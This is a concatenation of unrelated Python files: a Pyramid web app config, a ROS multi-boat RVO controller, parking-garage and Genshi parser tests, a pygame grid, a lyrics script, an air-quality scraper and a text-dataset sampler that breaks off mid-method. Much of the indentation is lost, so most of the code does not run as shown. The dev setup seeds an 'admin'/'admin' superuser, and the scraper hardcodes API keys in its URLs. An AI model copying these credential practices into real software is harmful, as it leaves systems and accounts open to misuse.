hashid._salt = settings['hashid_salt']
# add locale directory to project configuration
config.add_translation_dirs('whoahqa:locale')
# configure enketo
enketo.configure(
settings['enketo_url'],
settings['enketo_api_token'])
logging.config.fileConfig(
global_config['__file__'], disable_existing_loggers=False)
# configure password context
pwd_context.load_path(global_config['__file__'])
includeme(config)
if settings.get("environment", "") == DEVELOPMENT_ENV:
setup_development_data()
return config.make_wsgi_app()
def includeme(config):
config.include('pyramid_jinja2')
config.commit()
config.add_jinja2_search_path("whoahqa:templates")
config.get_jinja2_environment().filters['format_date'] = \
format_date_for_locale
config.get_jinja2_environment().filters['format_location_name'] = \
format_location_name
config.get_jinja2_environment().filters['round_or_none'] = round_or_none
config.add_static_view('static', 'static', cache_max_age=3600)
config.add_route('default', '/')
config.add_route('logout', '/logout/')
config.add_route('push', '/push/{action}')
config.add_route('locale', '/locale/')
config.add_route('admin', '/admin/*traverse', factory=UserFactory)
config.add_route('auth', '/auth/{action}')
config.add_route('users', '/users/*traverse',
factory=UserFactory)
config.add_route('clinics', '/clinics/*traverse',
factory=ClinicFactory)
config.add_route('submissions', '/submissions/*traverse',
factory=SubmissionFactory)
config.add_route('periods', '/reporting-periods/*traverse',
factory=ReportingPeriodFactory)
config.add_route('municipalities', '/municipalities/*traverse',
factory=LocationFactory)
config.add_route('states', '/states/*traverse',
factory=LocationFactory)
config.add_route('locations', '/locations/*traverse',
factory=LocationFactory)
config.scan()
def add_request_helpers(config):
# add .user to requests and cache it with reify
config.add_request_method(get_request_user, 'user', reify=True)
config.add_request_method(
can_access_clinics, 'can_access_clinics', reify=True)
config.add_request_method(can_view_clinics, 'can_view_clinics', reify=True)
config.add_request_method(can_list_clinics, 'can_list_clinics', reify=True)
config.add_request_method(
can_view_municipality, 'can_view_municipality', reify=True)
config.add_request_method(
can_create_period, 'can_create_period', reify=True)
config.add_request_method(can_view_state, 'can_view_state', reify=True)
config.add_request_method(can_list_state, 'can_list_state', reify=True)
config.add_request_method(is_super_user, 'is_super_user', reify=True)
def setup_development_data():
with transaction.manager:
setup_users()
setup_clinics()
setup_default_reporting_period()
def setup_users():
group_criteria = Group.name == groups.SUPER_USER
group_params = {'name': groups.SUPER_USER}
su_group = Group.get_or_create(
group_criteria,
**group_params)
su = User()
user_profile_criteria = UserProfile.username == 'admin'
user_profile_params = {
'user': su,
'username': 'admin',
'password': 'admin'}
profile = UserProfile.get_or_create(
user_profile_criteria,
**user_profile_params)
ona_user_params = {
'user': su,
'username': 'admin',
'refresh_token': '123456'}
ona_user = OnaUser.get_or_create(
OnaUser.username == "admin",
**ona_user_params)
su.group = su_group
profile.save()
ona_user.save()
def setup_clinics():
# add a couple of clinics
state_params = {'name': "Acre"}
state = State.get_or_create(
State.name == state_params['name'],
**state_params)
municipality_params = {'name': 'Brasilia',
'parent': state}
municipality = Municipality.get_or_create(
Municipality.name == municipality_params['name'],
**municipality_params)
clinic_criteria = Clinic.name == "Clinic A"
clinic_params = {
"name": "Clinic A",
"code": "1A2B",
"municipality": municipality}
clinic_a = Clinic.get_or_create(
clinic_criteria,
**clinic_params)
clinic_a.save()
    clinic_criteria = Clinic.name == "Clinic b"
    clinic_params = {
        "name": "Clinic b",
        "code": "1B2C",
        "municipality": municipality}
    clinic_b = Clinic.get_or_create(
        clinic_criteria,
        **clinic_params)
clinic_b.save()
user = OnaUser.get(OnaUser.username == 'admin').user
clinic_a.assign_to(user)
clinic_b.assign_to(user)
def setup_default_reporting_period():
title = 'Dev Period'
params = {
"title": title,
"start_date": datetime.datetime(2014, 11, 5),
"end_date": datetime.datetime(2014, 11, 30)
}
reporting_period = ReportingPeriod.get_or_create(
ReportingPeriod.title == title,
**params)
reporting_period.save()
|
#!/usr/bin/env python
import rospy
from duckiepond_vehicle.msg import UsvDrive
from sensor_msgs.msg import NavSatFix,Imu
from nav_msgs.msg import Odometry
from RVO import RVO_update, reach, compute_V_des
from PID import PID_control
from dynamic_reconfigure.server import Server
from control.cfg import ang_PIDConfig,dis_PIDConfig
import math
import tf
class BoatHRVO(object):
def __init__(self):
self.node_name = rospy.get_name()
rospy.loginfo("[%s] Initializing" %self.node_name)
        # initialize PID controllers
self.dis_pid = [PID_control("distance_control%d" % i) for i in range(4)]
self.angu_pid = [PID_control("angular_control%d" % i) for i in range(4)]
self.dis_server = Server(dis_PIDConfig,self.cb_dis_pid,"distance_control")
self.ang_server = Server(ang_PIDConfig,self.cb_ang_pid,"angular_control")
for i in range(4):
self.dis_pid[i].setSampleTime(0.1)
self.angu_pid[i].setSampleTime(0.1)
self.dis_pid[i].SetPoint = 0
self.angu_pid[i].SetPoint = 0
        # set up drive publishers and odometry subscribers for the four boats
        self.pub_v1 = rospy.Publisher("/boat1/cmd_drive", UsvDrive, queue_size=1)
        self.sub_p3d1 = rospy.Subscriber("/boat1/p3d_odom", Odometry, self.cb_boat1_odom, queue_size=1)
        self.pub_v2 = rospy.Publisher("/boat2/cmd_drive", UsvDrive, queue_size=1)
        self.sub_p3d2 = rospy.Subscriber("/boat2/p3d_odom", Odometry, self.cb_boat2_odom, queue_size=1)
        self.pub_v3 = rospy.Publisher("/boat3/cmd_drive", UsvDrive, queue_size=1)
        self.sub_p3d3 = rospy.Subscriber("/boat3/p3d_odom", Odometry, self.cb_boat3_odom, queue_size=1)
        self.pub_v4 = rospy.Publisher("/boat4/cmd_drive", UsvDrive, queue_size=1)
        self.sub_p3d4 = rospy.Subscriber("/boat4/p3d_odom", Odometry, self.cb_boat4_odom, queue_size=1)
        # initialize boat status
self.boat_odom = [Odometry() for i in range(4)]
self.cmd_drive = [UsvDrive() for i in range(4)]
self.yaw = [0 for i in range(4)]
        # initialize HRVO environment
self.ws_model = dict()
#robot radius
self.ws_model['robot_radius'] = 3
self.ws_model['circular_obstacles'] = []
        # rectangular boundary, format [x, y, width/2, height/2]
self.ws_model['boundary'] = []
self.pin1 = [7.5,7.5]
self.pin2 = [-7.5,7.5]
self.pin3 = [-7.5,-7.5]
self.pin4 = [7.5,-7.5]
self.position = []
self.goal = [self.pin3,self.pin4,self.pin1,self.pin2]
#print(self.position)
#print(self.goal)
self.velocity = [[0,0] for i in range(4)]
self.velocity_detect = [[0,0] for i in range(4)]
self.v_max = [1 for i in range(4)]
#timer
self.timer = rospy.Timer(rospy.Duration(0.2),self.cb_hrvo)
def cb_hrvo(self,event):
self.update_all()
v_des = compute_V_des(self.position,self.goal,self.v_max)
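        # RVO_update takes current positions, desired velocities and measured velocities and returns collision-free velocities for each boat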
self.velocity = RVO_update(self.position,v_des,self.velocity_detect,self.ws_model)
#print("position",self.position)
#print("velocity",self.velocity)
info = [[0,0] for i in range(4)]
for i in range(4):
dis , angle = self.process_ang_dis(self.velocity[i][0],self.velocity[i][1],self.yaw[i])
#self.dis_pid[i].update(dis)
self.angu_pid[i].update(angle)
#dis_out = max(min(self.dis_pid[i].output,1),-1) * -1
dis_out = max(min(dis,1),-1)
ang_out = max(min(self.angu_pid[i].output,1),-1)
#print(i,dis_out,ang_out)
self.cmd_drive[i] = self.control_cmd_drive(dis_out, ang_out)
info[i][0] = self.cmd_drive[i].left
info[i][1] = self.cmd_drive[i].right
#print(info)
self.pub_v1.publish(self.cmd_drive[0])
self.pub_v2.publish(self.cmd_drive[1])
self.pub_v3.publish(self.cmd_drive[2])
self.pub_v4.publish(self.cmd_drive[3])
def control_cmd_drive(self,dis,angle):
cmd = UsvDrive()
cmd.left = max(min(dis - angle,1),-1)
cmd.right = max(min(dis + angle,1),-1)
return cmd
def process_ang_dis(self,vx,vy,yaw):
dest_yaw = math.atan2(vy,vx)
if dest_yaw > yaw:
right_yaw = dest_yaw-yaw
left_yaw = (2*math.pi-right_yaw)*-1
else:
left_yaw = dest_yaw-yaw
right_yaw = (2*math.pi-(left_yaw*-1))
#-1 < angle < 1 , find close side to turn
angle = left_yaw if abs(left_yaw) < abs(right_yaw) else right_yaw
angle = angle/math.pi
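        # scale forward speed by heading alignment: full speed when pointing at the goal, reverse when facing away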
dis = (((1 - abs(angle))-0.5) * 2) * pow(vx*vx + vy*vy,0.5)
dis = max(min(dis,1),-1)
        angle = max(min(angle, 1), -1)
return dis , angle
def update_all(self):
self.position = []
for i in range(4):
#update position
pos = [self.boat_odom[i].pose.pose.position.x,self.boat_odom[i].pose.pose.position.y]
self.position.append(pos)
#update orientation
quaternion = (self.boat_odom[i].pose.pose.orientation.x,
self.boat_odom[i].pose.pose.orientation.y,
self.boat_odom[i].pose.pose.orientation.z,
self.boat_odom[i].pose.pose.orientation.w)
euler = tf.transformations.euler_from_quaternion(quaternion)
self.yaw[i] = euler[2]
#update velocity
self.velocity_detect[i] = [self.boat_odom[i].twist.twist.linear.x,
self.boat_odom[i].twist.twist.linear.y]
#print("\nboat%d" % i)
#print(self.position[i])
#print(self.yaw[i])
#print(self.velocity[i])
def cb_boat1_odom(self,msg):
self.boat_odom[0] = msg
def cb_boat2_odom(self,msg):
self.boat_odom[1] = msg
def cb_boat3_odom(self,msg):
self.boat_odom[2] = msg
def cb_boat4_odom(self,msg):
self.boat_odom[3] = msg
def cb_dis_pid(self,config,level):
print("distance: [Kp]: {Kp} [Ki]: {Ki} [Kd]: {Kd}\n".format(**config))
Kp = float("{Kp}".format(**config))
Ki = float("{Ki}".format(**config))
Kd = float("{Kd}".format(**config))
for i in range(4):
self.dis_pid[i].setKp(Kp)
self.dis_pid[i].setKi(Ki)
self.dis_pid[i].setKd(Kd)
return config
def cb_ang_pid(self,config,level):
print("angular: [Kp]: {Kp} [Ki]: {Ki} [Kd]: {Kd}\n".format(**config))
Kp = float("{Kp}".format(**config))
Ki = float("{Ki}".format(**config))
Kd = float("{Kd}".format(**config))
for i in range(4):
self.angu_pid[i].setKp(Kp)
self.angu_pid[i].setKi(Ki)
self.angu_pid[i].setKd(Kd)
return config
if __name__ == "__main__":
rospy.init_node("BoatHRVO")
boatHRVO = BoatHRVO()
rospy.spin()
|
from typing import List
from garage.garage import Garage
from garage.parking_level import ParkingLevel
from garage.parking_space import ParkingSpace
from garage.vehicle import Vehicle
from garage.vehicle_type import VehicleType
from test.utils import TestHelpers
def test_standard_cars_are_rejected_from_compact_parking_space():
parking_level_1 = ParkingLevel(
spaces=[ParkingSpace(compact=True), ParkingSpace(compact=True)]
)
parking_level_2 = ParkingLevel(
spaces=[ParkingSpace(compact=True), ParkingSpace(compact=True)]
)
parking_level_3 = ParkingLevel(
spaces=[ParkingSpace(compact=True), ParkingSpace(compact=True)]
)
garage = Garage(levels=[parking_level_1, parking_level_2, parking_level_3])
vehicle_1 = Vehicle(vehicle_type=VehicleType.Compact)
vehicle_2 = Vehicle(vehicle_type=VehicleType.Car)
vehicle_3 = Vehicle(vehicle_type=VehicleType.Car)
vehicle_4 = Vehicle(vehicle_type=VehicleType.Compact)
vehicle_5 = Vehicle(vehicle_type=VehicleType.Car)
vehicle_6 = Vehicle(vehicle_type=VehicleType.Car)
expected_rejected_vehicles: List[Vehicle] = [
vehicle_2,
vehicle_3,
vehicle_5,
vehicle_6,
]
actual_rejected_vehicles = garage.add_vehicles(
[vehicle_1, vehicle_2, vehicle_3, vehicle_4, vehicle_5, vehicle_6]
)
TestHelpers.assert_expected_vehicles_are_rejected(
actual=actual_rejected_vehicles, expected=expected_rejected_vehicles
)
def test_trucks_are_rejected_from_compact_parking_space():
parking_level_1 = ParkingLevel(
spaces=[ParkingSpace(compact=True), ParkingSpace(compact=True)]
)
parking_level_2 = ParkingLevel(
spaces=[ParkingSpace(compact=True), ParkingSpace(compact=True)]
)
parking_level_3 = ParkingLevel(
spaces=[ParkingSpace(compact=True), ParkingSpace(compact=True)]
)
garage = Garage(levels=[parking_level_1, parking_level_2, parking_level_3])
vehicle_1 = Vehicle(vehicle_type=VehicleType.Compact)
vehicle_2 = Vehicle(vehicle_type=VehicleType.Truck)
vehicle_3 = Vehicle(vehicle_type=VehicleType.Truck)
vehicle_4 = Vehicle(vehicle_type=VehicleType.Truck)
vehicle_5 = Vehicle(vehicle_type=VehicleType.Compact)
vehicle_6 = Vehicle(vehicle_type=VehicleType.Truck)
expected_rejected_vehicles: List[Vehicle] = [
vehicle_2,
vehicle_3,
vehicle_4,
vehicle_6,
]
actual_rejected_vehicles = garage.add_vehicles(
[vehicle_1, vehicle_2, vehicle_3, vehicle_4, vehicle_5, vehicle_6]
)
TestHelpers.assert_expected_vehicles_are_rejected(
actual=actual_rejected_vehicles, expected=expected_rejected_vehicles
)
def test_compact_vehicles_are_first_prioritized_into_compact_parking_space():
parking_level_1 = ParkingLevel(
spaces=[ParkingSpace(compact=True), ParkingSpace(compact=False)]
)
parking_level_2 = ParkingLevel(
spaces=[ParkingSpace(compact=False), ParkingSpace(compact=True)]
)
parking_level_3 = ParkingLevel(
spaces=[ParkingSpace(compact=False), ParkingSpace(compact=False)]
)
garage = Garage(levels=[parking_level_1, parking_level_2, parking_level_3])
vehicle_1 = Vehicle(vehicle_type=VehicleType.Car)
vehicle_2 = Vehicle(vehicle_type=VehicleType.Compact)
vehicle_3 = Vehicle(vehicle_type=VehicleType.Compact)
vehicle_4 = Vehicle(vehicle_type=VehicleType.Truck)
vehicle_5 = Vehicle(vehicle_type=VehicleType.Compact)
vehicle_6 = Vehicle(vehicle_type=VehicleType.Car)
expected_vehicles_on_level_1: List[Vehicle] = [vehicle_2, vehicle_1]
expected_vehicles_on_level_2: List[Vehicle] = [vehicle_4, vehicle_3]
expected_vehicles_on_level_3: List[Vehicle] = [vehicle_5, vehicle_6]
garage.add_vehicles(
[vehicle_1, vehicle_2, vehicle_3, vehicle_4, vehicle_5, vehicle_6]
)
TestHelpers.assert_expected_parking_placement(
levels=garage.levels,
expected_levels=[
expected_vehicles_on_level_1,
expected_vehicles_on_level_2,
expected_vehicles_on_level_3,
],
)
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2006-2009 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://genshi.edgewall.org/wiki/License.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://genshi.edgewall.org/log/.
import doctest
import sys
import unittest
from genshi.core import Attrs, Stream
from genshi.input import XMLParser, HTMLParser, ParseError
from genshi.compat import StringIO, BytesIO
class XMLParserTestCase(unittest.TestCase):
def test_text_node_pos_single_line(self):
text = '<elem>foo bar</elem>'
events = list(XMLParser(StringIO(text)))
kind, data, pos = events[1]
self.assertEqual(Stream.TEXT, kind)
self.assertEqual('foo bar', data)
self.assertEqual((None, 1, 6), pos)
def test_text_node_pos_multi_line(self):
text = '''<elem>foo
bar</elem>'''
events = list(XMLParser(StringIO(text)))
kind, data, pos = events[1]
self.assertEqual(Stream.TEXT, kind)
self.assertEqual('foo\nbar', data)
self.assertEqual((None, 1, -1), pos)
def test_element_attribute_order(self):
text = '<elem title="baz" id="foo" class="bar" />'
events = list(XMLParser(StringIO(text)))
kind, data, pos = events[0]
self.assertEqual(Stream.START, kind)
tag, attrib = data
self.assertEqual('elem', tag)
self.assertEqual(('title', 'baz'), attrib[0])
self.assertEqual(('id', 'foo'), attrib[1])
self.assertEqual(('class', 'bar'), attrib[2])
def test_unicode_input(self):
text = '<div>\u2013</div>'
events = list(XMLParser(StringIO(text)))
kind, data, pos = events[1]
self.assertEqual(Stream.TEXT, kind)
self.assertEqual('\u2013', data)
def test_latin1_encoded(self):
text = '<div>\xf6</div>'.encode('iso-8859-1')
events = list(XMLParser(BytesIO(text), encoding='iso-8859-1'))
kind, data, pos = events[1]
self.assertEqual(Stream.TEXT, kind)
self.assertEqual('\xf6', data)
def test_latin1_encoded_xmldecl(self):
text = """<?xml version="1.0" encoding="iso-8859-1" ?>
<div>\xf6</div>
""".encode('iso-8859-1')
events = list(XMLParser(BytesIO(text)))
kind, data, pos = events[2]
self.assertEqual(Stream.TEXT, kind)
self.assertEqual('\xf6', data)
def test_html_entity_with_dtd(self):
text = """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html> </html>
"""
events = list(XMLParser(StringIO(text)))
kind, data, pos = events[2]
self.assertEqual(Stream.TEXT, kind)
self.assertEqual('\xa0', data)
def test_html_entity_without_dtd(self):
text = '<html> </html>'
events = list(XMLParser(StringIO(text)))
kind, data, pos = events[1]
self.assertEqual(Stream.TEXT, kind)
self.assertEqual('\xa0', data)
def test_html_entity_in_attribute(self):
text = '<p title=" "/>'
events = list(XMLParser(StringIO(text)))
kind, data, pos = events[0]
self.assertEqual(Stream.START, kind)
self.assertEqual('\xa0', data[1].get('title'))
kind, data, pos = events[1]
self.assertEqual(Stream.END, kind)
def test_undefined_entity_with_dtd(self):
text = """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>&junk;</html>
"""
events = XMLParser(StringIO(text))
self.assertRaises(ParseError, list, events)
def test_undefined_entity_without_dtd(self):
text = '<html>&junk;</html>'
events = XMLParser(StringIO(text))
self.assertRaises(ParseError, list, events)
class HTMLParserTestCase(unittest.TestCase):
def test_text_node_pos_single_line(self):
text = '<elem>foo bar</elem>'
events = list(HTMLParser(StringIO(text)))
kind, data, pos = events[1]
self.assertEqual(Stream.TEXT, kind)
self.assertEqual('foo bar', data)
self.assertEqual((None, 1, 6), pos)
def test_text_node_pos_multi_line(self):
text = '''<elem>foo
bar</elem>'''
events = list(HTMLParser(StringIO(text)))
kind, data, pos = events[1]
self.assertEqual(Stream.TEXT, kind)
self.assertEqual('foo\nbar', data)
self.assertEqual((None, 1, 6), pos)
def test_input_encoding_text(self):
text = '<div>\xf6</div>'.encode('iso-8859-1')
events = list(HTMLParser(BytesIO(text), encoding='iso-8859-1'))
kind, data, pos = events[1]
self.assertEqual(Stream.TEXT, kind)
self.assertEqual('\xf6', data)
def test_input_encoding_attribute(self):
text = '<div title="\xf6"></div>'.encode('iso-8859-1')
events = list(HTMLParser(BytesIO(text), encoding='iso-8859-1'))
kind, (tag, attrib), pos = events[0]
self.assertEqual(Stream.START, kind)
self.assertEqual('\xf6', attrib.get('title'))
def test_unicode_input(self):
text = '<div>\u2013</div>'
events = list(HTMLParser(StringIO(text)))
kind, data, pos = events[1]
self.assertEqual(Stream.TEXT, kind)
self.assertEqual('\u2013', data)
def test_html_entity_in_attribute(self):
text = '<p title=" "></p>'
events = list(HTMLParser(StringIO(text)))
kind, data, pos = events[0]
self.assertEqual(Stream.START, kind)
self.assertEqual('\xa0', data[1].get('title'))
kind, data, pos = events[1]
self.assertEqual(Stream.END, kind)
def test_html_entity_in_text(self):
text = '<p> </p>'
events = list(HTMLParser(StringIO(text)))
kind, data, pos = events[1]
self.assertEqual(Stream.TEXT, kind)
self.assertEqual('\xa0', data)
def test_processing_instruction(self):
text = '<?php echo "Foobar" ?>'
events = list(HTMLParser(StringIO(text)))
kind, (target, data), pos = events[0]
self.assertEqual(Stream.PI, kind)
self.assertEqual('php', target)
self.assertEqual('echo "Foobar"', data)
def test_processing_instruction_no_data_1(self):
text = '<?foo ?>'
events = list(HTMLParser(StringIO(text)))
kind, (target, data), pos = events[0]
self.assertEqual(Stream.PI, kind)
self.assertEqual('foo', target)
self.assertEqual('', data)
def test_processing_instruction_no_data_2(self):
text = '<?experiment>...<?/experiment>'
events = list(HTMLParser(StringIO(text)))
kind, (target, data), pos = events[0]
self.assertEqual(Stream.PI, kind)
self.assertEqual('experiment', target)
self.assertEqual('', data)
kind, (target, data), pos = events[2]
self.assertEqual('/experiment', target)
self.assertEqual('', data)
def test_xmldecl(self):
text = '<?xml version="1.0" ?><root />'
events = list(XMLParser(StringIO(text)))
kind, (version, encoding, standalone), pos = events[0]
self.assertEqual(Stream.XML_DECL, kind)
self.assertEqual('1.0', version)
self.assertEqual(None, encoding)
self.assertEqual(-1, standalone)
def test_xmldecl_encoding(self):
text = '<?xml version="1.0" encoding="utf-8" ?><root />'
events = list(XMLParser(StringIO(text)))
kind, (version, encoding, standalone), pos = events[0]
self.assertEqual(Stream.XML_DECL, kind)
self.assertEqual('1.0', version)
self.assertEqual('utf-8', encoding)
self.assertEqual(-1, standalone)
def test_xmldecl_standalone(self):
text = '<?xml version="1.0" standalone="yes" ?><root />'
events = list(XMLParser(StringIO(text)))
kind, (version, encoding, standalone), pos = events[0]
self.assertEqual(Stream.XML_DECL, kind)
self.assertEqual('1.0', version)
self.assertEqual(None, encoding)
self.assertEqual(1, standalone)
def test_processing_instruction_trailing_qmark(self):
text = '<?php echo "Foobar" ??>'
events = list(HTMLParser(StringIO(text)))
kind, (target, data), pos = events[0]
self.assertEqual(Stream.PI, kind)
self.assertEqual('php', target)
self.assertEqual('echo "Foobar" ?', data)
def test_out_of_order_tags1(self):
text = '<span><b>Foobar</span></b>'
events = list(HTMLParser(StringIO(text)))
self.assertEqual(5, len(events))
self.assertEqual((Stream.START, ('span', ())), events[0][:2])
self.assertEqual((Stream.START, ('b', ())), events[1][:2])
self.assertEqual((Stream.TEXT, 'Foobar'), events[2][:2])
self.assertEqual((Stream.END, 'b'), events[3][:2])
self.assertEqual((Stream.END, 'span'), events[4][:2])
def test_out_of_order_tags2(self):
text = '<span class="baz"><b><i>Foobar</span></b></i>'.encode('utf-8')
events = list(HTMLParser(BytesIO(text), encoding='utf-8'))
self.assertEqual(7, len(events))
self.assertEqual((Stream.START, ('span', Attrs([('class', 'baz')]))),
events[0][:2])
self.assertEqual((Stream.START, ('b', ())), events[1][:2])
self.assertEqual((Stream.START, ('i', ())), events[2][:2])
self.assertEqual((Stream.TEXT, 'Foobar'), events[3][:2])
self.assertEqual((Stream.END, 'i'), events[4][:2])
self.assertEqual((Stream.END, 'b'), events[5][:2])
self.assertEqual((Stream.END, 'span'), events[6][:2])
def test_out_of_order_tags3(self):
text = '<span><b>Foobar</i>'.encode('utf-8')
events = list(HTMLParser(BytesIO(text), encoding='utf-8'))
self.assertEqual(5, len(events))
self.assertEqual((Stream.START, ('span', ())), events[0][:2])
self.assertEqual((Stream.START, ('b', ())), events[1][:2])
self.assertEqual((Stream.TEXT, 'Foobar'), events[2][:2])
self.assertEqual((Stream.END, 'b'), events[3][:2])
self.assertEqual((Stream.END, 'span'), events[4][:2])
def test_hex_charref(self):
text = '<span>'</span>'
events = list(HTMLParser(StringIO(text)))
self.assertEqual(3, len(events))
self.assertEqual((Stream.START, ('span', ())), events[0][:2])
self.assertEqual((Stream.TEXT, "'"), events[1][:2])
self.assertEqual((Stream.END, 'span'), events[2][:2])
def test_multibyte_character_on_chunk_boundary(self):
text = 'a' * ((4 * 1024) - 1) + '\xe6'
events = list(HTMLParser(BytesIO(text.encode('utf-8')),
encoding='utf-8'))
self.assertEqual(1, len(events))
self.assertEqual((Stream.TEXT, text), events[0][:2])
def suite():
suite = unittest.TestSuite()
suite.addTest(doctest.DocTestSuite(XMLParser.__module__))
suite.addTest(unittest.makeSuite(XMLParserTestCase, 'test'))
suite.addTest(unittest.makeSuite(HTMLParserTestCase, 'test'))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
from pygame import Rect
class Grid:
@classmethod
def init(cls):
return cls((0, 0), (1, 1), (1, 1))
def __init__(self, position, size, slice, gap=(0, 0)):
self.slice = slice
self.size = size
self.gap = gap
self.position = position
self.update()
def calculate_cut(self):
x = self.slice[0] + self.gap[0]
y = self.slice[1] + self.gap[1]
return x, y
def calculate_rect(self, position):
width = self.size[0] * self.cut[0]
height = self.size[1] * self.cut[1]
return Rect(position, (width, height))
def get_rect(self, location):
return Rect(
location[0] * self.cut[0] + self.rect.x,
location[1] * self.cut[1] + self.rect.y,
self.slice[0],
self.slice[1])
def get_location(self, mouse_position):
mx, my = mouse_position
x = int((mx - self.rect.x) / self.cut[0])
y = int((my - self.rect.y) / self.cut[1])
if not self.location_within(x, y):
return
if self.get_rect((x, y)).collidepoint(mx, my):
return x, y
return
def location_within(self, x, y):
sx, sy = self.size
if 0 <= x < sx:
if 0 <= y < sy:
return True
return False
def update(self):
self.cut = self.calculate_cut()
self.rect = self.calculate_rect(self.position)
|
from translathor import translator
from apicalls import *
def caller():
intention = input(
"To get songs by an artist use (F)\nTo get music lyrics use(G)\nUse (H) to get lyrics and translate -->")
if intention.lower() not in ['f', 'g', 'h'] :
exit("Lmao, get serious abeg")
elif intention.lower() == "g":
for text in get_lyrics():
print(text)
elif intention.lower() == "f":
get_songsby()
else:
print(translator(get_lyrics()))
if __name__ == "__main__":
print(caller())
|
import gevent.monkey
gevent.monkey.patch_all()  # patch blocking IO first so the gevent-spawned fetches below actually run concurrently

import csv
import time
import json
import requests
import numpy as np
import urllib
from datetime import datetime
from urllib.request import urlopen
start_time = time.time()
header_row = False
count = 0
file_name = "dust_result_" + time.strftime("%Y%m%d-%H%M%S") + ".csv"
# urls = ['https://api.waqi.info/mapq/bounds/?bounds=26.748288,97.037243,50.571187,1153.902477&inc=placeholders&k=_2Y2EzVBxYGVgdIzsJSBRWXmldaA09PSNWFXgZZQ==&_=1491802275939']
xmax = 153
xmin = 97
ymax = 46
ymin = 22
# x_list = np.linspace(xmin,xmax,10)
# y_list = np.linspace(ymin,ymax,10)
x_list = np.arange(xmin,xmax,2)
y_list = np.arange(ymin,ymax,2)
urls = []
for x_idx, x in enumerate(x_list):
for y_idx, y in enumerate(y_list):
if x_idx > 0 and y_idx > 0:
urls.append('https://api.waqi.info/mapq/bounds/?bounds='+ str(y_list[y_idx-1]) + ',' + str(x_list[x_idx-1]) + ',' + str(y) + ',' + str(x) +'&inc=placeholders&k=_2Y2EzVBxmFRAdIyNNSzJWXmldaAw9AzdWFlY7IA==&_=1492570231356')
# print(x)
# print(y)
print(len(urls))
def print_head(url):
global header_row
# print('Starting {}'.format(url))
data = urlopen(url).read().decode('utf8')
resultstr = json.loads(data)
print("length:", str(len(resultstr)))
with open(file_name, "a", encoding='utf-8') as outcsv:
dict_writer = csv.DictWriter(outcsv,
fieldnames=["lat", "lon", "city", "idx", "stamp", "pol", "x", "aqi", "tz",
"utime", "img"], delimiter=',', lineterminator='\n')
if header_row == False:
dict_writer.writeheader()
header_row = True
dict_writer.writerows(resultstr)
print("--- %s seconds ---" % (time.time() - start_time))
jobs = [gevent.spawn(print_head, _url) for _url in urls]
gevent.wait(jobs)
|
import glob
import numpy as np
import os
import tensorflow as tf
import tqdm
import random
def data_paths(path):
paths = []
if os.path.isfile(path):
# Simple file
paths.append(path)
elif os.path.isdir(path):
# Directory
for (dirpath, _, fnames) in os.walk(path):
for fname in fnames:
paths.append(os.path.join(dirpath, fname))
else:
# Assume glob
paths = glob.glob(path)
return paths
def load_dataset(enc, paths, combine):
token_chunks = []
indices = []
raw_text = ''
i = 0
for path in tqdm.tqdm(paths, disable=len(paths) == 1):
indices.append([])
if path.endswith('.npz'):
# Pre-encoded
with np.load(path) as npz:
indices[-1].append(i)
for item in npz.files:
token_chunks.append(npz[item])
i += 1
indices[-1].append(i - 1)
else:
# Plain text
indices[-1].append(i)
with open(path, 'r') as fp:
raw_text += fp.read()
if len(raw_text) >= combine:
tokens = np.stack(enc.encode(raw_text))
token_chunks.append(tokens)
i += 1
raw_text = ''
else:
raw_text += '<|endoftext|>'
indices[-1].append(i - 1)
if raw_text:
tokens = np.stack(enc.encode(raw_text))
token_chunks.append(tokens)
indices[-1].append(i)
i += 1
return token_chunks, indices
def binary_search(f, lo, hi):
    """Finds the smallest index in (lo, hi] for which f is True, assuming f is
    monotonic (False up to some point, then True). Returns None if f(lo) is
    already True or f(hi) is False."""
    if f(lo) or not f(hi):
        return None
while hi > lo + 1:
mid = (lo + hi) // 2
if f(mid):
hi = mid
else:
lo = mid
return hi
class Sampler(object):
"""Fairly samples a slice from a set of variable sized chunks.
'Fairly' means that the distribution is the same as sampling from one concatenated chunk,
but without crossing chunk boundaries."""
def __init__(self, enc, combine, path, perm_path, num_simultaneous_files=5, seed=None, dataset_loader=load_dataset, arr_paths=False, shuffle=True):
self.load_dataset = dataset_loader
self.enc = enc
self.combine = combine
print('Loading perma dataset')
if perm_path is None:
self.permchunks = []
else:
self.permchunks, _ = self.load_dataset(enc, perm_path if arr_paths else data_paths(perm_path), combine)
self.num_simultaneous_files = num_simultaneous_files
print('Loading cycling dataset')
if path is None:
self.paths = []
else:
self.paths = path if arr_paths else data_paths(path)
self.seed = seed
if shuffle:
random.shuffle(self.paths)
self.chunks, self.chunkindices = self.load_dataset(enc, self.paths[:num_simultaneous_files], combine)
self.cycleindex = 0
print('Paths loaded:', self.paths[:num_simultaneous_files])
self.set_chunks(self.chunks)
def set_chunks(self, chunks):
chunks.extend(self.permchunks)
self.chunks = chunks
self.total_size = sum(chunk.shape[0] for chunk in chunks)
self.boundaries = [0]
for i in range(len(chunks)):
self.boundaries.append(self.boundaries[-1] + chunks[i].shape[0])
self.rs = np.random.RandomState(seed=self.seed)
def cycle_files(self):
if len(self.paths) - len(self.chunkindices) == 0 or self.num_simultaneous_files == 0:
# can't cycle :(
return
self.chunks = self.chunks[:self.chunkindices[-1][-1] + 1]
# assert self.chunkindices[0][0] == 0
# unload first file
del self.chunks[:self.chunkindices[0][-1] + 1]
del self.chunkindices[0]
# shift indices
newdelta = self.chunkindices[0][0]
self.chunkindices = [[y - newdelta for y in x] for x in self.chunkindices]
# assert self.chunkindices[0][0] == 0
# assert len(self.chunkindices) == 1 or self.chunkindices[1][0] == self.chunkindices[0][-1] + 1
# print('Unloaded file {}'.format(self.paths[self.cycleindex]))
sidx = self.cycleindex + len(self.chunkindices) + 1
sidx %= len(self.paths)
# print('Loading file {}'.format(self.paths[sidx]))
nc, ncis = self.load_dataset(self.enc, [self.paths[sidx]], self.combine)
self.chunks.extend(nc)
